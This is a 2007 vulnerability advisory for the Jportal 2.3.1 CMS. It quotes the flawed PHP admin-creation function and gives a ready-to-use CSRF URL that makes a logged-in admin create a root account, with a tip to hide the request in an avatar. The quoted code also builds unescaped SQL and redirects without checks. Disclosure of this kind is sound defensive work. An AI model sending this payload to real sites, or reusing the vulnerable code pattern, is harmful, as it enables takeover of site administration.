Jportal 2.3.1 CSRF vulnerability

2007.02.15
Credit: dzitu
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

Type: CSRF Attack / Input Validation Error Remote: Yes Version: 2.3.1 (very possible, that older versions are vulnerable too) Problem is in admin/admin.adm.php: function add_admin() { global $name, $mail, $nick_, $action, $user_tbl, $access; global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto; if($access=='root') { if($_pass==$pass_) { if($acce[news]=='') $acce[news]='n'; if($acce[info]=='') $acce[info]='n'; if($acce[art]=='') $acce[art]='n'; if($acce[sonda]=='') $acce[sonda]='n'; if($acce[link]=='') $acce[link]='n'; if($acce[forum]=='') $acce[forum]='n'; if($acce[comm]=='') $acce[comm]='n'; if($acce[menu]=='') $acce[menu]='n'; if($acce[bann]=='') $acce[bann]='n'; if($acce[topic]=='') $acce[topic]='n'; if($acce[file]=='') $acce[file]='n'; if($acce[root]<>'t') { $acce_ = $acce[news].'-'.$acce[art].'-'.$acce[info].'-'.$acce[sonda].'-'.$acce[li nk].'-'.$acce[forum].'-'.$acce[comm].'-'.$acce[file].'-'.$acce[menu].'-' .$acce[bann].'-'.$acce[topic]; } else { $acce_ = 'root'; } $query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_', '$mail', 1)"; $result = mysql_query($query); add_log('dodano administratora (ID '.mysql_insert_id().')'); if($goto=='') header("Location: admin.php?op=$op"); else header("Location: $goto"); exit; As we can see, all variables comes from "nowhere" (i.e. it can be POST, GET, even COOKIE) and it's not checked, if script was launched by admin through admin panel or not. Due to this fact, if only admin has logged in and not logged out, if we let him send prepared request, we can get a root account (For example using our profile avatar). http://vulnerable_jportal/admin.php?op=admin&name=admin&mail=&nick_=admi n&_pass=pass&pass_=haslo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add gives us root account with name "admin" and password "pass". D&#380;itu dzitu (at) poczta (dot) fm [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top